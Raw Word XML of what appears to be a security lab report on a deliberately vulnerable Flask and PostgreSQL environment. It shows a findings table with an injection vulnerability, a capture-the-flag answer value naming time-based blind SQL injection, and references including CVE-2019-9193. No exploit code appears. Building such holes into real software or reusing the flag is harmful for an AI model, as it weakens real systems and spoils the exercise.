          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="108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8.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="189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C1C06">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Flask /login endpoint + PostgreSQL backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3780" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="001C1C0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FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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postgres_time_based_blind_sqli</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C1C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:rsidR="00C6093B" w:rsidRDefault="00C6093B" w:rsidP="001C1C06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="001C1C0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C1C06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References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="00C6093B">
      <w:p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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The following references were used during the design, implementation, and analysis of the vulnerable lab environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="00C6093B" w:rsidRDefault="001C1C06" w:rsidP="001C1C06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C6093B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CVE References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="001C1C06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CVE-2019-9193 – PostgreSQL COPY TO PROGRAM Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>National Vulnerability Database (NVD):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42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NVD CVE-2019-9193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1C1C06" w:rsidRDefault="001C1C06" w:rsidP="00C6093B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MITRE CVE Entry – CVE-2019-9193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43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MITRE CVE Database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C6093B" w:rsidRPr="00C6093B" w:rsidRDefault="00C6093B" w:rsidP="00C6093B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="00C6093B" w:rsidRDefault="001C1C06" w:rsidP="001C1C06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C6093B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lastRenderedPageBreak/>
        <w:t>Official Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="001C1C06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PostgreSQL Documentation – SECURITY DEFINER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44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PostgreSQL CREATE FUNCTION Documentation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1C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="001C1C06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PostgreSQL Documentation – COPY Command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45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PostgreSQL COPY Documentation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1C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="001C1C06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Flask Official Documentation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46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Flask Documentation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1C1C06" w:rsidRPr="00C6093B" w:rsidRDefault="001C1C06" w:rsidP="00C6093B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Docker Compose Documentation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47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Docker Compose Docs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1C1C06" w:rsidRPr="00C6093B" w:rsidRDefault="001C1C06" w:rsidP="001C1C06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C6093B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Security References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="001C1C06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OWASP SQL Injection Prevention Cheat Sheet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48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OWASP SQL Injec</w:t>
        </w:r>
        <w:bookmarkStart w:id="0" w:name="_GoBack"/>
        <w:bookmarkEnd w:id="0"/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tion Prevention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1C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="001C1C06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MITRE ATT&amp;CK Framework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49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MITRE ATT&amp;CK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1C1C06" w:rsidRPr="00C6093B" w:rsidRDefault="001C1C06" w:rsidP="00C6093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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVSS v3.1 Calculator</w:t>
      </w:r>
      <w:r w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId50" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="001C1C06">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>FIRST CVSS Calculator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="00C6093B" w:rsidRDefault="001C1C06" w:rsidP="001C1C06">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00C6093B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</w:rPr>
        <w:t>Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="001C1C06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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker Desktop – container runtime and testing </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="001C1C06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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker Compose – multi-container orchestration </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="001C1C06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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL – vulnerable database services </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="001C1C06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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Flask – vulnerable web application </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="001C1C06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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub – version control and collaboration </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="001C1C06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1C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PowerShell – deployment and testing automation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="001C1C06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001C1C06" w:rsidRPr="001C1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C58" w:rsidRDefault="00D11C58" w:rsidP="00705C2B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D11C58" w:rsidRDefault="00D11C58" w:rsidP="00705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C58" w:rsidRDefault="00D11C58" w:rsidP="00705C2B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D11C58" w:rsidRDefault="00D11C58" w:rsidP="00705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06B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA2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2F08"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11985B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C53B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="045CA1C4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9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0" w:hanging="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="19D54412"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="670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07D91"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CC042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D0F6F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0264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B2F71"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="729C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B1482"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8C2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07F60"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C7E34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75359C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B816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C7D0E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="46F0C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E6"/>
    <w:rsid w:val="00036502"/>
    <w:rsid w:val="001025F6"/>
    <w:rsid w:val="001C0AC3"/>
    <w:rsid w:val="001C1C06"/>
    <w:rsid w:val="00222491"/>
    <w:rsid w:val="0027619E"/>
    <w:rsid w:val="0028684C"/>
    <w:rsid w:val="0031438B"/>
    <w:rsid w:val="0046061C"/>
    <w:rsid w:val="00532422"/>
    <w:rsid w:val="0054119B"/>
    <w:rsid w:val="005635CB"/>
    <w:rsid w:val="005A7ECC"/>
    <w:rsid w:val="006313C6"/>
    <w:rsid w:val="006A6328"/>
    <w:rsid w:val="006C4102"/>
    <w:rsid w:val="00705C2B"/>
    <w:rsid w:val="00707F78"/>
    <w:rsid w:val="00731E37"/>
    <w:rsid w:val="00793B0C"/>
    <w:rsid w:val="007B0AA5"/>
    <w:rsid w:val="007D3F98"/>
    <w:rsid w:val="007D6A9A"/>
    <w:rsid w:val="007E1FD9"/>
    <w:rsid w:val="007F3B84"/>
    <w:rsid w:val="008119BD"/>
    <w:rsid w:val="00880D62"/>
    <w:rsid w:val="00914EE6"/>
    <w:rsid w:val="009731C2"/>
    <w:rsid w:val="00A10A8E"/>
    <w:rsid w:val="00A24F20"/>
    <w:rsid w:val="00A52DFA"/>
    <w:rsid w:val="00A600DE"/>
    <w:rsid w:val="00AB5D28"/>
    <w:rsid w:val="00AE65E8"/>
    <w:rsid w:val="00B518EE"/>
    <w:rsid w:val="00B867F6"/>
    <w:rsid w:val="00BC08E9"/>
    <w:rsid w:val="00C32C81"/>
    <w:rsid w:val="00C6093B"/>
    <w:rsid w:val="00C92EE9"/>
    <w:rsid w:val="00CE55EE"/>
    <w:rsid w:val="00D11C58"/>
    <w:rsid w:val="00D752D5"/>
    <w:rsid w:val="00DB2B1D"/>
    <w:rsid w:val="00DD38FF"/>
    <w:rsid w:val="00E24158"/>
    <w:rsid w:val="00E26A17"/>
    <w:rsid w:val="00E474FC"/>
    <w:rsid w:val="00E53CBD"/>
    <w:rsid w:val="00EA487F"/>
    <w:rsid w:val="00F27F26"/>
    <w:rsid w:val="00F668BD"/>
    <w:rsid w:val="00FA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B55D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F8B7B1E8-DFEC-4B44-AC30-C1AC577F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AA5"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0091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E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E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E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E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86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5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C2B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00705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C2B"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="002761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619E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6C41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D38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D38F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B0A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E65E8"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ListTable3-Accent1">
    <w:name w:val="List Table 3 Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="48"/>
    <w:rsid w:val="0031438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0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9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4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9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7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3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6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086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1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9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239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1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7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08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2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03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869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0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3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9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5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8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653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9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7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4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372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7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9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0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31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2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0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0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nvd.nist.gov/vuln/detail/CVE-2019-9193?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/compose/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.1?utm_source=chatgp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flask.palletsprojects.com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www.postgresql.org/docs/current/sql-copy.html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attack.mitre.org/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www.postgresql.org/docs/current/sql-createfunction.html?utm_source=chatgpt.com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cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9193&amp;utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html?utm_source=chatgpt.com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A677D-9D11-403B-BDE8-05B91EF0F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25</Pages>
  <Words>2159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Mohamed</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>bookworm 165</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-19T00:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-19T07:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>